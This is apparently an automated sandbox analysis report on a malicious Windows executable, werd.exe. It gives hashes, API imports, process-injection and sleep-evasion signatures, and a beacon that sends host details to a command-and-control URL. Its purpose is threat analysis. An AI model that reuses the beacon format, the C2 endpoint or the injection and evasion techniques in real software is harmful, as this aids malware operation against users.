Analysis

Category Package Started Completed Duration Options Log
FILE exe 2018-12-04 17:35:08 2018-12-04 17:39:03 235 seconds Show Options Show Log
route = internet
procdump = 1
2018-12-04 17:35:15,015 [root] INFO: Date set to: 12-04-18, time set to: 17:35:15
2018-12-04 17:35:15,062 [root] DEBUG: Starting analyzer from: C:\esgppejl
2018-12-04 17:35:15,062 [root] DEBUG: Storing results at: C:\fSzqujHD
2018-12-04 17:35:15,062 [root] DEBUG: Pipe server name: \\.\PIPE\dTsePCF
2018-12-04 17:35:15,078 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2018-12-04 17:35:15,078 [root] INFO: Automatically selected analysis package "exe"
2018-12-04 17:35:16,559 [root] DEBUG: Started auxiliary module Browser
2018-12-04 17:35:16,559 [root] DEBUG: Started auxiliary module Curtain
2018-12-04 17:35:16,559 [modules.auxiliary.digisig] INFO: Skipping authenticode validation, signtool.exe was not found in bin/
2018-12-04 17:35:16,559 [root] DEBUG: Started auxiliary module DigiSig
2018-12-04 17:35:16,575 [root] DEBUG: Started auxiliary module Disguise
2018-12-04 17:35:16,575 [root] DEBUG: Started auxiliary module Human
2018-12-04 17:35:16,575 [root] DEBUG: Started auxiliary module Screenshots
2018-12-04 17:35:16,575 [root] DEBUG: Started auxiliary module Sysmon
2018-12-04 17:35:16,575 [root] DEBUG: Started auxiliary module Usage
2018-12-04 17:35:16,575 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL option
2018-12-04 17:35:16,575 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL_64 option
2018-12-04 17:35:16,839 [lib.api.process] INFO: Successfully executed process from path "C:\Users\user\AppData\Local\Temp\werd.exe" with arguments "" with pid 2972
2018-12-04 17:35:16,917 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2018-12-04 17:35:16,934 [lib.api.process] INFO: 32-bit DLL to inject is C:\esgppejl\dll\rOVOUYs.dll, loader C:\esgppejl\bin\SrmYGGF.exe
2018-12-04 17:35:17,028 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2972
2018-12-04 17:35:19,039 [lib.api.process] INFO: Successfully resumed process with pid 2972
2018-12-04 17:35:19,039 [root] INFO: Added new process to list with pid: 2972
2018-12-04 17:35:19,134 [root] DEBUG: Terminate processes on terminate_event disabled.
2018-12-04 17:35:19,134 [root] DEBUG: Process dumps enabled.
2018-12-04 17:35:19,196 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2972 at 0x74480000, image base 0x400000, stack from 0x186000-0x190000
2018-12-04 17:35:19,196 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Local\Temp\werd.exe".
2018-12-04 17:35:19,196 [root] INFO: Monitor successfully loaded in process with pid 2972.
2018-12-04 17:35:20,085 [root] INFO: Disabling sleep skipping.
2018-12-04 17:35:42,128 [root] DEBUG: DLL loaded at 0x75600000: C:\Windows\syswow64\WININET (0xf5000 bytes).
2018-12-04 17:35:42,158 [root] DEBUG: DLL loaded at 0x74F40000: C:\Windows\syswow64\urlmon (0x136000 bytes).
2018-12-04 17:35:42,158 [root] DEBUG: DLL loaded at 0x75980000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2018-12-04 17:35:42,158 [root] DEBUG: DLL loaded at 0x75790000: C:\Windows\syswow64\CRYPT32 (0x11d000 bytes).
2018-12-04 17:35:42,158 [root] DEBUG: DLL loaded at 0x755F0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2018-12-04 17:35:42,158 [root] DEBUG: DLL loaded at 0x76CA0000: C:\Windows\syswow64\iertutil (0x1fb000 bytes).
2018-12-04 17:35:42,190 [root] DEBUG: DLL loaded at 0x749C0000: C:\Windows\system32\IPHLPAPI (0x1c000 bytes).
2018-12-04 17:35:42,190 [root] DEBUG: DLL loaded at 0x75130000: C:\Windows\syswow64\NSI (0x6000 bytes).
2018-12-04 17:35:42,190 [root] DEBUG: DLL loaded at 0x749B0000: C:\Windows\system32\WINNSI (0x7000 bytes).
2018-12-04 17:35:42,190 [root] DEBUG: DLL loaded at 0x749A0000: C:\Windows\system32\dhcpcsvc6 (0xd000 bytes).
2018-12-04 17:35:42,206 [root] DEBUG: DLL loaded at 0x75D00000: C:\Windows\syswow64\WS2_32 (0x35000 bytes).
2018-12-04 17:35:42,206 [root] DEBUG: DLL loaded at 0x74980000: C:\Windows\system32\dhcpcsvc (0x12000 bytes).
2018-12-04 17:35:42,221 [root] DEBUG: DLL loaded at 0x742E0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32 (0x19e000 bytes).
2018-12-04 17:35:42,267 [root] DEBUG: DLL loaded at 0x75E70000: C:\Windows\syswow64\SHELL32 (0xc4a000 bytes).
2018-12-04 17:35:42,267 [root] DEBUG: DLL loaded at 0x74970000: C:\Windows\system32\profapi (0xb000 bytes).
2018-12-04 17:35:42,283 [root] DEBUG: DLL loaded at 0x74B50000: C:\Windows\system32\dnsapi (0x44000 bytes).
2018-12-04 17:35:42,283 [root] DEBUG: DLL unloaded from 0x75D60000.
2018-12-04 17:35:42,299 [root] DEBUG: DLL loaded at 0x74810000: C:\Windows\system32\RASAPI32 (0x52000 bytes).
2018-12-04 17:35:42,299 [root] DEBUG: DLL loaded at 0x74950000: C:\Windows\system32\rasman (0x15000 bytes).
2018-12-04 17:35:42,299 [root] DEBUG: DLL unloaded from 0x74810000.
2018-12-04 17:35:42,315 [root] DEBUG: DLL loaded at 0x74940000: C:\Windows\system32\rtutils (0xd000 bytes).
2018-12-04 17:35:42,315 [root] DEBUG: DLL loaded at 0x74930000: C:\Windows\system32\sensapi (0x6000 bytes).
2018-12-04 17:35:42,315 [root] DEBUG: DLL unloaded from 0x75600000.
2018-12-04 17:35:42,315 [root] DEBUG: DLL unloaded from 0x74950000.
2018-12-04 17:35:42,315 [root] DEBUG: DLL loaded at 0x74BD0000: C:\Windows\system32\NLAapi (0x10000 bytes).
2018-12-04 17:35:42,331 [root] DEBUG: DLL loaded at 0x74BC0000: C:\Windows\system32\napinsp (0x10000 bytes).
2018-12-04 17:35:42,331 [root] DEBUG: DLL loaded at 0x74BA0000: C:\Windows\system32\pnrpnsp (0x12000 bytes).
2018-12-04 17:35:42,331 [root] DEBUG: DLL loaded at 0x74BF0000: C:\Windows\System32\mswsock (0x3c000 bytes).
2018-12-04 17:35:42,331 [root] DEBUG: DLL loaded at 0x74B40000: C:\Windows\System32\winrnr (0x8000 bytes).
2018-12-04 17:35:42,331 [root] DEBUG: DLL loaded at 0x74BE0000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2018-12-04 17:35:42,331 [root] DEBUG: DLL loaded at 0x74800000: C:\Windows\System32\wship6 (0x6000 bytes).
2018-12-04 17:35:42,331 [root] DEBUG: DLL loaded at 0x747F0000: C:\Windows\system32\rasadhlp (0x6000 bytes).
2018-12-04 17:35:42,345 [root] DEBUG: DLL loaded at 0x742A0000: C:\Windows\System32\fwpuclnt (0x38000 bytes).
2018-12-04 17:35:42,361 [root] DEBUG: DLL loaded at 0x74EB0000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2018-12-04 17:35:42,392 [root] DEBUG: DLL loaded at 0x74240000: C:\Windows\System32\netprofm (0x5a000 bytes).
2018-12-04 17:35:42,408 [root] DEBUG: DLL loaded at 0x74C70000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2018-12-04 17:35:42,408 [root] DEBUG: DLL loaded at 0x74C30000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2018-12-04 17:35:42,408 [root] DEBUG: DLL loaded at 0x747E0000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2018-12-04 17:35:42,424 [root] DEBUG: DLL unloaded from 0x749C0000.
2018-12-04 17:35:42,424 [root] DEBUG: DLL unloaded from 0x74980000.
2018-12-04 17:35:44,701 [root] DEBUG: DLL unloaded from 0x75600000.
2018-12-04 17:35:54,717 [root] DEBUG: DLL unloaded from 0x751B0000.
2018-12-04 17:35:54,717 [root] DEBUG: DLL unloaded from 0x74240000.
2018-12-04 17:35:54,717 [root] DEBUG: DLL unloaded from 0x75600000.
2018-12-04 17:38:40,920 [root] INFO: Analysis timeout hit, terminating analysis.
2018-12-04 17:38:40,920 [root] INFO: Created shutdown mutex.
2018-12-04 17:38:41,934 [root] INFO: Setting terminate event for process 2972.
2018-12-04 17:38:41,934 [root] DEBUG: Terminate Event: Attempting to dump process 2972
2018-12-04 17:38:41,934 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00400000.
2018-12-04 17:38:41,934 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2018-12-04 17:38:41,934 [root] DEBUG: DumpProcess: Module entry point VA is 0x000015F0.
2018-12-04 17:38:41,934 [root] DEBUG: PeParser: Section 1 size too big: 0xe8000000
2018-12-04 17:38:41,934 [root] DEBUG: DumpProcess: There was a problem reading one or more sections, the dump may be incomplete.
2018-12-04 17:38:41,934 [root] DEBUG: DumpProcess: Error - Cannot dump image.
2018-12-04 17:38:42,448 [root] INFO: Shutting down package.
2018-12-04 17:38:42,448 [root] INFO: Stopping auxiliary modules.
2018-12-04 17:38:42,448 [root] INFO: Finishing auxiliary modules.
2018-12-04 17:38:42,448 [root] INFO: Shutting down pipe server and dumping dropped files.
2018-12-04 17:38:42,448 [root] INFO: Analysis completed.

MalScore

10.0

Malicious

Machine

Name Label Manager Started On Shutdown On
target-01 target-01 ESX 2018-12-04 17:35:09 2018-12-04 17:39:01

File Details

File Name werd.exe
File Size 114690 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 cea527236e09f569093fea67d8008e80
SHA1 1ca7329aa0df6b5a423adb9c4366457e1affc764
SHA256 ad783ca9c2bd4c9905b131d170c1dce5bad9de8b8c2d4607a8cd051021284df0
SHA512 e2731aa843d7e130ef7831eb603b17cb399c74a169eb9326feab6ceccdf81b971db0d7bcb1b02e599a635de255838e955e8803448bde369eee964d87473c2eee
CRC32 DD1CC66D
Ssdeep 1536:M3Clavs0DxaffdBlEQdWgVdl5atwlPaqqhKxy5+Jq0rVvixQ:M3CkvsNdBWQdJlUtwlfqX0rsK
TrID
  • 41.0% (.EXE) Win32 Executable MS Visual C++ (generic) (31206/45/13)
  • 36.3% (.EXE) Win64 Executable (generic) (27625/18/4)
  • 8.6% (.DLL) Win32 Dynamic Link Library (generic) (6578/25/2)
  • 5.9% (.EXE) Win32 Executable (generic) (4508/7/1)
  • 2.6% (.EXE) OS/2 Executable (generic) (2029/13)
ClamAV None matched
Yara None matched
CAPE Yara None matched
Download Download ZIP Resubmit sample

Signatures

Behavioural detection: Executable code extraction
Behavioural detection: Decompression of executable module(s).
Creates RWX memory
A process attempted to delay the analysis task.
Process: werd.exe tried to sleep 1140 seconds, actually delayed analysis time by 0 seconds
Dynamic (imported) function loading detected
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: WININET.dll/HttpSendRequestA
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCrackUrlA
DynamicLoader: WININET.dll/HttpOpenRequestA
DynamicLoader: WININET.dll/InternetSetOptionA
DynamicLoader: WININET.dll/InternetQueryOptionA
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetConnectA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: IPHLPAPI.DLL/GetAdaptersAddresses
DynamicLoader: PSAPI.DLL/GetProcessImageFileNameA
DynamicLoader: PSAPI.DLL/EnumProcesses
DynamicLoader: ntdll.dll/RtlDecompressBuffer
DynamicLoader: kernel32.dll/GetComputerNameA
DynamicLoader: kernel32.dll/CreateFileA
DynamicLoader: kernel32.dll/GetTempFileNameA
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/GetProcessHeap
DynamicLoader: kernel32.dll/GetVersion
DynamicLoader: kernel32.dll/lstrcpyA
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/GetWindowsDirectoryA
DynamicLoader: kernel32.dll/GetVolumeInformationA
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/VirtualAllocEx
DynamicLoader: kernel32.dll/VirtualFreeEx
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/GetProcessId
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/WriteProcessMemory
DynamicLoader: kernel32.dll/GetThreadContext
DynamicLoader: kernel32.dll/SetThreadContext
DynamicLoader: kernel32.dll/ResumeThread
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/GetSystemInfo
DynamicLoader: kernel32.dll/lstrcmpiA
DynamicLoader: kernel32.dll/lstrcatA
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/CreateProcessA
DynamicLoader: kernel32.dll/GetEnvironmentVariableA
DynamicLoader: kernel32.dll/GetTempPathA
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: ADVAPI32.dll/CryptDestroyHash
DynamicLoader: ADVAPI32.dll/CryptHashData
DynamicLoader: ADVAPI32.dll/CryptCreateHash
DynamicLoader: ADVAPI32.dll/CryptDecrypt
DynamicLoader: ADVAPI32.dll/CryptDestroyKey
DynamicLoader: ADVAPI32.dll/CryptDeriveKey
DynamicLoader: ADVAPI32.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/CryptAcquireContextA
DynamicLoader: ADVAPI32.dll/LookupAccountSidA
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: sechost.dll/LookupAccountSidLocalA
DynamicLoader: RASAPI32.dll/RasConnectionNotificationW
DynamicLoader: sechost.dll/NotifyServiceStatusChangeA
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: IPHLPAPI.DLL/GetAdaptersAddresses
DynamicLoader: dhcpcsvc.DLL/DhcpRequestParams
DynamicLoader: kernel32.dll/GetNativeSystemInfo
DynamicLoader: CRYPTSP.dll/CryptAcquireContextA
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptDeriveKey
DynamicLoader: CRYPTSP.dll/CryptDecrypt
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetNativeSystemInfo
DynamicLoader: kernel32.dll/GetNativeSystemInfo
DynamicLoader: kernel32.dll/GetNativeSystemInfo
DynamicLoader: kernel32.dll/GetNativeSystemInfo
DynamicLoader: kernel32.dll/GetNativeSystemInfo
DynamicLoader: kernel32.dll/GetNativeSystemInfo
DynamicLoader: kernel32.dll/GetNativeSystemInfo
DynamicLoader: kernel32.dll/GetNativeSystemInfo
Performs HTTP requests potentially not found in PCAP.
url: ninglarenlac.com:80//4/forum.php
url: ninglarenlac.com:80//4/forum.php
url: ninglarenlac.com:80//4/forum.php
url: ninglarenlac.com:80//4/forum.php
url: ninglarenlac.com:80//4/forum.php
url: ninglarenlac.com:80//4/forum.php
url: ninglarenlac.com:80//4/forum.php
url: ninglarenlac.com:80//4/forum.php
url: ninglarenlac.com:80//4/forum.php
HTTP traffic contains suspicious features which may be indicative of malware related traffic
post_no_referer: HTTP traffic contains a POST request with no referer header
suspicious_request: http://ninglarenlac.com/4/forum.php
Performs some HTTP requests
url: http://api.ipify.org/
url: http://ninglarenlac.com/4/forum.php
Looks up the external IP address
domain: api.ipify.org
A process sent information about the computer to a remote location.
Beacon: werd.exe: GUID=11855836160270601216&BUILD=03gre12&INFO=WIN7-X64-CUCKOO @ WIN7-X64-CUCKOO\user&IP=5.62.62.203&TYPE=1&WIN=6.1(x64)
Anomalous binary characteristics
anomaly: Actual checksum does not match that reported in PE header

Screenshots


Hosts

Direct IP Country Name
Y 8.8.8.8 [VT] United States
N 23.21.121.219 [VT] United States
N 191.101.20.16 [VT] Netherlands

DNS

Name Response Post-Analysis Lookup
api.ipify.org [VT] A 23.21.121.219 [VT]
CNAME nagano-19599.herokussl.com [VT]
A 50.16.248.221 [VT]
A 50.19.229.252 [VT]
A 54.221.234.215 [VT]
A 23.23.114.123 [VT]
A 54.243.123.39 [VT]
CNAME elb097307-934924932.us-east-1.elb.amazonaws.com [VT]
ninglarenlac.com [VT] A 191.101.20.16 [VT]

Summary

C:\
C:\Windows\Globalization\Sorting\sortdefault.nls
\Device\KsecDD
C:\ProgramData\Microsoft\Network\Connections\Pbk\rasphone.pbk
C:\ProgramData\Microsoft\Network\Connections\Pbk\*.pbk
C:\Windows\System32\ras\*.pbk
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\rasphone.pbk
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\*.pbk
C:\Windows\Globalization\Sorting\sortdefault.nls
\Device\KsecDD
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASAPI32\EnableFileTracing
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASAPI32\FileTracingMask
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASAPI32\EnableConsoleTracing
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASAPI32\ConsoleTracingMask
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASAPI32\MaxFileSize
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASAPI32\FileDirectory
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASMANCS\EnableFileTracing
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASMANCS\FileTracingMask
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASMANCS\EnableConsoleTracing
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASMANCS\ConsoleTracingMask
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASMANCS\MaxFileSize
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASMANCS\FileDirectory
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001\ProfileImagePath
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
\xe0\xa3\xb8\xc7\xb7EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASAPI32\EnableFileTracing
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASAPI32\FileTracingMask
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASAPI32\EnableConsoleTracing
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASAPI32\ConsoleTracingMask
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASAPI32\MaxFileSize
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASAPI32\FileDirectory
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASMANCS\EnableFileTracing
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASMANCS\FileTracingMask
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASMANCS\EnableConsoleTracing
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASMANCS\ConsoleTracingMask
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASMANCS\MaxFileSize
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASMANCS\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001\ProfileImagePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
\xe0\xa3\xb8\xc7\xb7EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
kernel32.dll.GetModuleHandleA
kernel32.dll.LoadLibraryA
kernel32.dll.VirtualAlloc
kernel32.dll.VirtualFree
kernel32.dll.OutputDebugStringA
ntdll.dll._stricmp
ntdll.dll.memset
ntdll.dll.memcpy
ntdll.dll.RtlDecompressBuffer
kernel32.dll.HeapAlloc
kernel32.dll.HeapFree
kernel32.dll.GetProcessHeap
kernel32.dll.VirtualQuery
kernel32.dll.ExitProcess
user32.dll.SetTimer
user32.dll.GetMessageA
user32.dll.TranslateMessage
user32.dll.DispatchMessageA
user32.dll.DefWindowProcA
user32.dll.RegisterClassExA
user32.dll.CreateWindowExA
wininet.dll.InternetOpenA
wininet.dll.HttpSendRequestA
wininet.dll.HttpQueryInfoA
wininet.dll.InternetCrackUrlA
wininet.dll.HttpOpenRequestA
wininet.dll.InternetSetOptionA
wininet.dll.InternetQueryOptionA
wininet.dll.InternetReadFile
wininet.dll.InternetConnectA
wininet.dll.InternetCloseHandle
iphlpapi.dll.GetAdaptersAddresses
psapi.dll.GetProcessImageFileNameA
psapi.dll.EnumProcesses
kernel32.dll.GetComputerNameA
kernel32.dll.CreateFileA
kernel32.dll.GetTempFileNameA
kernel32.dll.GetVersion
kernel32.dll.lstrcpyA
kernel32.dll.lstrlenA
kernel32.dll.GetWindowsDirectoryA
kernel32.dll.GetVolumeInformationA
kernel32.dll.Sleep
kernel32.dll.GetProcAddress
kernel32.dll.VirtualAllocEx
kernel32.dll.VirtualFreeEx
kernel32.dll.OpenProcess
kernel32.dll.TerminateProcess
kernel32.dll.CreateThread
kernel32.dll.GetProcessId
kernel32.dll.GetLastError
kernel32.dll.WriteProcessMemory
kernel32.dll.GetThreadContext
kernel32.dll.SetThreadContext
kernel32.dll.ResumeThread
kernel32.dll.WriteFile
kernel32.dll.CloseHandle
kernel32.dll.GetSystemInfo
kernel32.dll.lstrcmpiA
kernel32.dll.lstrcatA
kernel32.dll.CreateProcessA
kernel32.dll.GetEnvironmentVariableA
kernel32.dll.GetTempPathA
user32.dll.wsprintfA
advapi32.dll.CryptDestroyHash
advapi32.dll.CryptHashData
advapi32.dll.CryptCreateHash
advapi32.dll.CryptDecrypt
advapi32.dll.CryptDestroyKey
advapi32.dll.CryptDeriveKey
advapi32.dll.CryptReleaseContext
advapi32.dll.CryptAcquireContextA
advapi32.dll.LookupAccountSidA
advapi32.dll.GetTokenInformation
advapi32.dll.OpenProcessToken
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
sechost.dll.LookupAccountSidLocalA
rasapi32.dll.RasConnectionNotificationW
sechost.dll.NotifyServiceStatusChangeA
cryptbase.dll.SystemFunction036
ole32.dll.CoInitializeEx
advapi32.dll.RegDeleteTreeA
advapi32.dll.RegDeleteTreeW
ole32.dll.CoCreateInstance
dhcpcsvc.dll.DhcpRequestParams
kernel32.dll.GetNativeSystemInfo
cryptsp.dll.CryptAcquireContextA
cryptsp.dll.CryptCreateHash
cryptsp.dll.CryptHashData
cryptsp.dll.CryptDeriveKey
cryptsp.dll.CryptDecrypt
cryptsp.dll.CryptDestroyHash
cryptsp.dll.CryptDestroyKey
cryptsp.dll.CryptReleaseContext
ole32.dll.CoUninitialize
oleaut32.dll.#500
DBWinMutex
IESQMMUTEX_0_208

Binary Entropy

PE Information

Image Base 0x00400000
Entry Point 0x004031a7
Reported Checksum 0x00029fa9
Actual Checksum 0x0002a9b8
Minimum OS Version 4.0
Compile Time 2018-10-01 03:26:14
Import Hash d764ef4b711af20241bc7fecaa6e63df

Sections

Name Virtual Address Virtual Size Size of Raw Data Characteristics Entropy
.text 0x00001000 0x0000c7a7 0x0000d000 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 5.96
.rdata 0x0000e000 0x0000132c 0x00002000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 2.80
.data 0x00010000 0x0000b5a0 0x00004000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 1.04
.rsrc 0x0001c000 0x00008000 0x00008000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 4.00

Overlay

Offset 0x0001c000
Size 0x00000002

Imports

Library MPR.dll:
Library KERNEL32.dll:
0x40e000 DecodePointer
0x40e00c CreateFileA
0x40e010 FindVolumeClose
0x40e014 GetDriveTypeW
0x40e018 SetErrorMode
0x40e01c QueryDosDeviceA
0x40e020 WaitForSingleObject
0x40e024 SetEvent
0x40e034 WideCharToMultiByte
0x40e040 GetFileAttributesA
0x40e044 GetOverlappedResult
0x40e048 GetLastError
0x40e054 CreateEventW
0x40e068 FindFirstVolumeA
0x40e06c CloseHandle
0x40e070 FindNextVolumeA
0x40e074 CreateThread
0x40e078 HeapFree
0x40e07c HeapAlloc
0x40e080 GetCommandLineA
0x40e084 GetCommandLineW
0x40e088 HeapSetInformation
0x40e08c TerminateProcess
0x40e090 GetCurrentProcess
0x40e09c IsDebuggerPresent
0x40e0a0 GetCPInfo
0x40e0ac GetACP
0x40e0b0 GetOEMCP
0x40e0b4 IsValidCodePage
0x40e0b8 EncodePointer
0x40e0bc TlsAlloc
0x40e0c0 TlsGetValue
0x40e0c4 TlsSetValue
